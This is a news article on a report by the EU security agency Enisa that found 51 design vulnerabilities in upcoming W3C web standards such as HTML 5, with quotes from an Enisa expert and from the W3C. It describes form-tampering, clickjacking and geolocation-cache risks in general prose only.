Emerging web standards have over 50 security design flaws, many of which could allow an attacker to steal information, the EU's security agency has warned.
During year-long research, the European Network Information Security Agency (Enisa) discovered 51 vulnerabilities in 13 upcoming World Wide Web Consortium (W3C) standards and specifications, the agency said in a report on Monday. Among these were issues with the HTML 5 standard, which is being used by Microsoft, Adobe and others in their latest web browsers.
"They're not rootkit-type vulnerabilities, they're more likely to allow an attacker to control a browser context," Giles Hogben, a network security expert at Enisa, told ZDNet UK. "For example, a dodgy page could get information from a legitimate page."
Using the flaws, an attacker could trick people into installing malware to give the hacker remote control of their system, he added. Many could allow a criminal to steal information using form submission and cross-domain requests, according to Enisa.
In HTML 5, one of the serious design vulnerabilities opens the door to form-tampering through HTML injection. In one scenario, a person buying goods online enters credit card number and other information into a web form. HTML 5 allows buttons, such as a submit button, to exist outside a web form. With the design flaw, an attacker could trick the buyer into sending the financial information to an unintended destination using a malicious button.
Another possible attack outlined by Enisa turns a browser security feature — a sandbox — into a method of subverting HTML 5 security. Putting websites into a sandbox prevents them from accessing the system via the browser. However, the attack described by Enisa uses the sandbox to disable protection against clickjacking. In clickjacking, a user is fooled into clicking on a seemingly innocuous web object such as a button, which then reveals confidential information.
The HTML 5 specification allows a hacker to put a malicious page inside a sandboxed iframe, disabling top-level navigation, and leaving the user open to clickjacking.
Another flaw highlighted by Enisa, in the Geoloc-Secure-3 cache API specification, lets a hacker retrieve information about the user's location from the cache. In addition, the specification fails to set an upper limit to how long geolocation data is stored in the cache, leaving people open to attacks that give away their movements.
The W3C has time to change some of the standards, but some may not be reworked to mitigate the flaws completely, according to Hogben. For example, the consortium is unlikely to fully mitigate the HTML 5 form-filling threat through the standard, he said.
"Some of the flaws we don't expect to be [fully] fixed... especially the one about the forms, as the functionality should be in there for a reason," said Hogben. "We don't expect W3C to take the forms functionality out of the spec."
The standards have been developing for varying amounts of time, and Enisa has submitted its report to W3C in time for W3C working groups to consider before specifying the final standards.
"We have worked with Enisa in preparing this review to ensure that it is relevant and timely to the standards work that is going on. What you are seeing here is the security review process functioning as it should: Independent review identifies possible security issues; the relevant Working Groups then analyse and address the issues raised," the W3C said in a statement.
"The relevant W3C working groups will indeed address these vulnerabilities according to the usual W3C process," it added.